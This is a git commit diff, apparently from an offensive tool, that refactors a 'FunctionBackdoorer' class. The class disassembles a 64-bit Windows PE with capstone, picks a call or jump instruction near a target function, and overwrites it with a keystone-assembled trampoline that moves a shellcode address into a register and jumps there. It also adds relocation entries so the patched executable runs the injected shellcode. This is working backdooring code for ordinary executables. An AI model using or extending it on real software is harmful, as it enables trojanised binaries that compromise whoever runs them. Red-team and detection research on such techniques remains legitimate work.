refactor: remove recursion from DerBackdoorer

This commit is contained in:
Dobin
2024-04-27 14:14:23 +01:00
parent a81c0c4d1a
commit aca1ed46bc
6 changed files with 99 additions and 96 deletions
+55 -46
View File
@@ -4,11 +4,9 @@
#
import random
import textwrap
import pefile
import capstone
import keystone
from enum import IntEnum
import logging
from utils import hexdump
@@ -18,89 +16,101 @@ from model.defs import *
logger = logging.getLogger("DerBackdoorer")
class FunctionBackdoorer:
def __init__(self, superpe: SuperPe, main_shc: bytes):
self.superpe: SuperPe = superpe
self.shellcodeData: bytes = main_shc
self.shellcodeAddr: int = 0
class DEPTH_OPTIONS(Enum):
LEVEL1 = 1
LEVEL2a = 2
LEVEL2b = 3
class FunctionBackdoorer:
def __init__(self, superpe: SuperPe, depth_option=DEPTH_OPTIONS.LEVEL1):
self.superpe: SuperPe = superpe
self.pe_data = self.superpe.pe.get_memory_mapped_image()
self.cs = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64 + capstone.CS_MODE_LITTLE_ENDIAN)
self.ks = keystone.Ks(keystone.KS_ARCH_X86, keystone.KS_MODE_64 + keystone.KS_MODE_LITTLE_ENDIAN)
self.cs.detail = True
self.depth_option: DEPTH_OPTIONS = depth_option
def backdoor_function(self, function_addr: int, shellcode_addr: int):
self.shellcodeAddr = shellcode_addr
logger.info("Backdooring function at 0x{:X} (to shellcode 0x{:X})".format(function_addr, shellcode_addr))
instr = self.find_suitable_instruction_addr(function_addr, 128)
if instr is None:
addr = self.find_suitable_instruction_addr(function_addr)
if addr is None:
raise Exception("Couldn't find a suitable instruction to backdoor")
compiled_trampoline, trampoline_reloc_offset = self.get_trampoline(instr)
#logger.info("--[ Choosen addr to overwrite: 0x{:X}".format(addr))
compiled_trampoline, text_trampoline, trampoline_reloc_offset = self.get_trampoline(addr, shellcode_addr)
logger.info("--[ Backdoor 0x{:X}: {}".format(
addr, text_trampoline))
# write
self.superpe.pe.set_bytes_at_rva(instr.address, bytes(compiled_trampoline))
self.superpe.pe.set_bytes_at_rva(addr, bytes(compiled_trampoline))
# relocs
relocs = (
instr.address + trampoline_reloc_offset,
addr + trampoline_reloc_offset,
)
pageRva = 4096 * int((instr.address + trampoline_reloc_offset) / 4096)
pageRva = 4096 * int((addr + trampoline_reloc_offset) / 4096)
self.superpe.addImageBaseRelocations(pageRva, relocs)
def find_suitable_instruction_addr(self, startOffset, length, maxDepth = 5):
def find_suitable_instruction_addr(self, startOffset, length=256):
"""Find a instruction to backdoor. Recursively."""
return self._find_suitable_instruction_addr(startOffset, length, maxDepth, 1)
logger.info("find suitable instr to hijack: off: from 0x{:X} len:{} depthopt:{}".format(
startOffset, length, self.depth_option))
if self.depth_option == DEPTH_OPTIONS.LEVEL1:
return self._find_suitable_instruction_addr(startOffset, length, 1)
else:
addr = self._find_suitable_instruction_addr(startOffset, length, 2)
logger.info("Using code at 0x{:X} to find instruction".format(addr))
if self.depth_option == DEPTH_OPTIONS.LEVEL2a:
return self._find_suitable_instruction_addr(addr, length, 2)
elif self.depth_option == DEPTH_OPTIONS.LEVEL2b:
return self._find_suitable_instruction_addr(addr, length, 3)
return None
def _find_suitable_instruction_addr(self, startOffset, length, maxDepth, depth):
logger.info("find_suitable_instruction_addr: off: 0x{:X} len:{} depth:{}".format(startOffset, length, depth))
if depth > maxDepth:
return None
def _find_suitable_instruction_addr(self, startOffset, length, option):
#logger.info("_find_suitable_instruction_addr: off: 0x{:X} len:{} option:{}".format(startOffset, length, option))
# iterate through every instruction. starting from startOffset
data = self.pe_data[startOffset:startOffset + length]
for instr in self.cs.disasm(data, startOffset):
self.printInstr(instr, depth)
# find a call/jmp instruction with an immediate operand
self.printInstr(instr, 0)
if instr.mnemonic.lower() in ['ret']:
return None
if len(instr.operands) != 1:
continue
operand = instr.operands[0]
if operand.type != capstone.CS_OP_IMM:
# find a call/jmp instruction with an immediate operand
continue
# We found one. check it.
logger.info('\t' * depth + f' -> Found OP_IMM: 0x{operand.value.imm:X}')
is_jumpy = instr.mnemonic.lower() in ['jmp', 'je', 'jz', 'jne', 'jnz', 'ja', 'jb', 'jae', 'jbe', 'jg', 'jl', 'jge', 'jle']
is_jumpy |= instr.mnemonic.lower() == 'call'
if not is_jumpy:
jump_instructions = ['call', 'jmp', 'je', 'jz', 'jne', 'jnz', 'ja', 'jb', 'jae', 'jbe', 'jg', 'jl', 'jge', 'jle']
if not instr.mnemonic.lower() in jump_instructions:
continue
if option == 1: # addr
return instr.address
elif option == 2: # dest taken
return operand.value.imm
elif option == 3: # dest not taken
return instr.address + instr.size
# dont take a jump too early
if depth >= 2:
# use this as the backdoor
return instr
else:
# follow it deeper
if depth + 1 <= maxDepth:
out = self._find_suitable_instruction_addr(
operand.value.imm, length, maxDepth, depth + 1)
return out
return None
def get_trampoline(self, instr):
def get_trampoline(self, addr, shellcode_addr):
addrOffset = -1
if not self.superpe.is_64():
raise Exception("Not 64 bit")
reg = random.choice(['rax', 'rbx', 'rcx', 'rdx', 'rsi', 'rdi']).upper()
full_shellcode_addr = self.shellcodeAddr + self.superpe.pe.OPTIONAL_HEADER.ImageBase
full_shellcode_addr = shellcode_addr + self.superpe.pe.OPTIONAL_HEADER.ImageBase
enc, count = self.ks.asm(f'MOV {reg}, 0x{full_shellcode_addr:X}')
for instr2 in self.cs.disasm(bytes(enc), 0):
@@ -121,12 +131,11 @@ class FunctionBackdoorer:
trampoline_text = f'MOV {reg}, 0x{full_shellcode_addr:X} ; {jump}'
trampoline_compiled, count = self.ks.asm(trampoline_text)
logger.info("--[ Backdooring {} at 0x{:X} with trampoline: {}".format(
instr.mnemonic.upper(), instr.address, trampoline_text))
return trampoline_compiled, addrOffset
return trampoline_compiled, trampoline_text, addrOffset
def printInstr(self, instr, depth):
def printInstr(self, instr, depth=0):
_bytes = [f'{x:02x}' for x in instr.bytes[:8]]
if len(instr.bytes) < 8:
_bytes.extend([' ',] * (8 - len(instr.bytes)))
+1 -1
View File
@@ -63,7 +63,7 @@ def get_code_section(pe: pefile.PE) -> pefile.SectionStructure:
if sect.Characteristics & pefile.SECTION_CHARACTERISTICS['IMAGE_SCN_MEM_EXECUTE']:
if entrypoint >= sect.VirtualAddress and entrypoint <= sect.VirtualAddress + sect.Misc_VirtualSize:
return sect
raise Exception("Code section not found")
raise Exception("pehelper::get_code_section(): Code section not found")
# keystone/capstone stuff
+8 -2
View File
@@ -276,11 +276,17 @@ class SuperPe():
entry["size"] = next_entry["addr"] - entry["addr"]
return res
def get_size_of_exported_function(self, dllfunc):
exports = self.get_exports_full()
for exp in exports:
if exp["name"] == dllfunc:
return exp["size"]
return None
## Helpers
def get_physical_address(self, virtual_address) -> int:
def get_offset_from_rva(self, virtual_address) -> int:
"""Convert a virtual address to a physical address in the PE file"""
# Iterate through the section headers to find which section contains the VA
for section in self.pe.sections: